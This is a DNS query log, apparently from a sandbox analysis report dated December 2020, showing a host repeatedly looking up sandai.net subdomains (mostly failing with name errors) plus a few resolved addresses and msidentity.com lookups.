                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.476078987 CET8.8.8.8192.168.2.30x3d74Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.007798910 CET8.8.8.8192.168.2.30xdf01Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.130484104 CET8.8.8.8192.168.2.30x302eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.524380922 CET8.8.8.8192.168.2.30xbe4bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.051537037 CET8.8.8.8192.168.2.30x841dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.585874081 CET8.8.8.8192.168.2.30xf3dbName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)hub5pr.sandai.netbgphub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.39.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.169.85A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.195.246A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.194.216A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.171.207A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.125.145A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.804965973 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.807198048 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.840622902 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.843271971 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.845679045 CET8.8.8.8192.168.2.30xaafdName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.882863045 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.884290934 CET8.8.8.8192.168.2.30x297bName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922142029 CET8.8.8.8192.168.2.30xbbbaName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922636032 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.958138943 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.959275007 CET8.8.8.8192.168.2.30x9cd7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.995296001 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.998722076 CET8.8.8.8192.168.2.30x95a8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.102962017 CET8.8.8.8192.168.2.30x112dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.258291006 CET8.8.8.8192.168.2.30x7007Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.287118912 CET8.8.8.8192.168.2.30x4483Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.294251919 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.323529005 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.332926989 CET8.8.8.8192.168.2.30x527Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.360413074 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.370055914 CET8.8.8.8192.168.2.30xac55Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.408910990 CET8.8.8.8192.168.2.30x3d9bName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.409029961 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.633642912 CET8.8.8.8192.168.2.30xcc35Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.172971010 CET8.8.8.8192.168.2.30x833dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.722223043 CET8.8.8.8192.168.2.30x75f8Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.258011103 CET8.8.8.8192.168.2.30xdb3cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.799576044 CET8.8.8.8192.168.2.30xd7ecName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.341470003 CET8.8.8.8192.168.2.30x4d11Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.875819921 CET8.8.8.8192.168.2.30xfc5cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.408987999 CET8.8.8.8192.168.2.30x9a51Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.931457043 CET8.8.8.8192.168.2.30x5ca0Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:07.490495920 CET8.8.8.8192.168.2.30x7e7fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:08.032026052 CET8.8.8.8192.168.2.30x30c1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:08.579233885 CET8.8.8.8192.168.2.30xe50bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.117932081 CET8.8.8.8192.168.2.30x44d1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.650924921 CET8.8.8.8192.168.2.30xef1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.189573050 CET8.8.8.8192.168.2.30xd095Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.736742973 CET8.8.8.8192.168.2.30x7ed4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.259766102 CET8.8.8.8192.168.2.30xa443Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.814625025 CET8.8.8.8192.168.2.30xbcd9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:12.592415094 CET8.8.8.8192.168.2.30xe663Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:13.201133013 CET8.8.8.8192.168.2.30x711dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.384213924 CET8.8.8.8192.168.2.30x2267Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.915936947 CET8.8.8.8192.168.2.30x9788Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.457453966 CET8.8.8.8192.168.2.30xdcafName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.006361961 CET8.8.8.8192.168.2.30x122fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.544770956 CET8.8.8.8192.168.2.30x8a7fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.072150946 CET8.8.8.8192.168.2.30xd65dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.611612082 CET8.8.8.8192.168.2.30x1808Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.151106119 CET8.8.8.8192.168.2.30x905fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.707458019 CET8.8.8.8192.168.2.30xfbd3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.244326115 CET8.8.8.8192.168.2.30x44adName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.776283979 CET8.8.8.8192.168.2.30x6843Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.331681013 CET8.8.8.8192.168.2.30xca7dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.869514942 CET8.8.8.8192.168.2.30x492Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.384578943 CET8.8.8.8192.168.2.30x769fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.917773962 CET8.8.8.8192.168.2.30x9e60Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.479697943 CET8.8.8.8192.168.2.30x8d8fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.010308027 CET8.8.8.8192.168.2.30x9f9bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.538587093 CET8.8.8.8192.168.2.30xf2e2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.081728935 CET8.8.8.8192.168.2.30x434fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.627392054 CET8.8.8.8192.168.2.30xf3f3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.151590109 CET8.8.8.8192.168.2.30xf392Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.699100018 CET8.8.8.8192.168.2.30xca6eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.253832102 CET8.8.8.8192.168.2.30xb27dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.776443005 CET8.8.8.8192.168.2.30xee8fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.299865007 CET8.8.8.8192.168.2.30xb72cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.832472086 CET8.8.8.8192.168.2.30x7fabName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.374311924 CET8.8.8.8192.168.2.30x2273Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.910343885 CET8.8.8.8192.168.2.30xd524Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.431976080 CET8.8.8.8192.168.2.30xab11Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.969094038 CET8.8.8.8192.168.2.30x7ec4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:30.574170113 CET8.8.8.8192.168.2.30x58e1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.119700909 CET8.8.8.8192.168.2.30xa3a5Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.639300108 CET8.8.8.8192.168.2.30x53cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.198580027 CET8.8.8.8192.168.2.30xb3a6Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.722119093 CET8.8.8.8192.168.2.30x1bd9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.269009113 CET8.8.8.8192.168.2.30x3fdeName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.808217049 CET8.8.8.8192.168.2.30xbae7Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.331381083 CET8.8.8.8192.168.2.30x2cffName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.869741917 CET8.8.8.8192.168.2.30x8f55Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.387875080 CET8.8.8.8192.168.2.30xde4eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.940874100 CET8.8.8.8192.168.2.30xefb1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:36.487648964 CET8.8.8.8192.168.2.30x76e6Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.040384054 CET8.8.8.8192.168.2.30xbfffName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.574875116 CET8.8.8.8192.168.2.30x5b38Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.089510918 CET8.8.8.8192.168.2.30x19afName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.604686975 CET8.8.8.8192.168.2.30xb75dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.136360884 CET8.8.8.8192.168.2.30x7d09Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.676059008 CET8.8.8.8192.168.2.30xb04eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.230995893 CET8.8.8.8192.168.2.30x14baName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.761543989 CET8.8.8.8192.168.2.30x2ad0Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.285490036 CET8.8.8.8192.168.2.30x9080Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.809024096 CET8.8.8.8192.168.2.30xf744Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.343743086 CET8.8.8.8192.168.2.30xd5c9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.879030943 CET8.8.8.8192.168.2.30x8c9cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.413537025 CET8.8.8.8192.168.2.30x55c1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.942786932 CET8.8.8.8192.168.2.30x7badName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.467500925 CET8.8.8.8192.168.2.30x405fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.011172056 CET8.8.8.8192.168.2.30x415dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.527698040 CET8.8.8.8192.168.2.30x521cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.096565962 CET8.8.8.8192.168.2.30x912aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.624881983 CET8.8.8.8192.168.2.30xf57cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.186608076 CET8.8.8.8192.168.2.30x2942Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.755641937 CET8.8.8.8192.168.2.30xf3d4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.279632092 CET8.8.8.8192.168.2.30xe143Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.825647116 CET8.8.8.8192.168.2.30x59d5Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.344616890 CET8.8.8.8192.168.2.30x6525Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.886678934 CET8.8.8.8192.168.2.30x2253Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.418781042 CET8.8.8.8192.168.2.30xfacfName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.942514896 CET8.8.8.8192.168.2.30x66cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.481712103 CET8.8.8.8192.168.2.30xe583Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.997468948 CET8.8.8.8192.168.2.30xfc99Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:52.558666945 CET8.8.8.8192.168.2.30x20e2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.074649096 CET8.8.8.8192.168.2.30xbb96Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.599467039 CET8.8.8.8192.168.2.30xdc95Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.122626066 CET8.8.8.8192.168.2.30xc8d3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.661765099 CET8.8.8.8192.168.2.30xd67eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.192456961 CET8.8.8.8192.168.2.30xfcc1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.715823889 CET8.8.8.8192.168.2.30xd800Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.262578964 CET8.8.8.8192.168.2.30x89abName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.783624887 CET8.8.8.8192.168.2.30x8ec8Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.337253094 CET8.8.8.8192.168.2.30x4c3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.857445002 CET8.8.8.8192.168.2.30xa191Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.405559063 CET8.8.8.8192.168.2.30xea8bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.950757980 CET8.8.8.8192.168.2.30xff92Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.481197119 CET8.8.8.8192.168.2.30x7b7cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.024873018 CET8.8.8.8192.168.2.30xefe7Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.559737921 CET8.8.8.8192.168.2.30xcd07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.093219995 CET8.8.8.8192.168.2.30x8b57Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.625252962 CET8.8.8.8192.168.2.30x2300Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.171911955 CET8.8.8.8192.168.2.30x2707Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.211256981 CET8.8.8.8192.168.2.30x3c54No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.725611925 CET8.8.8.8192.168.2.30x2276Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.248840094 CET8.8.8.8192.168.2.30x1abaName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.764144897 CET8.8.8.8192.168.2.30x146bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.294631958 CET8.8.8.8192.168.2.30xf9deName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.810632944 CET8.8.8.8192.168.2.30xe7e9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.357727051 CET8.8.8.8192.168.2.30xee33Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.905102015 CET8.8.8.8192.168.2.30xffeaName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.435257912 CET8.8.8.8192.168.2.30x4136Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.967833042 CET8.8.8.8192.168.2.30xbad5Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:07.497612953 CET8.8.8.8192.168.2.30xfbb4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:08.013257027 CET8.8.8.8192.168.2.30xac9dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:08.530966997 CET8.8.8.8192.168.2.30x214aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.060971022 CET8.8.8.8192.168.2.30x3d2eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.593342066 CET8.8.8.8192.168.2.30xf783Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.139463902 CET8.8.8.8192.168.2.30xf14cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.654100895 CET8.8.8.8192.168.2.30xb07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
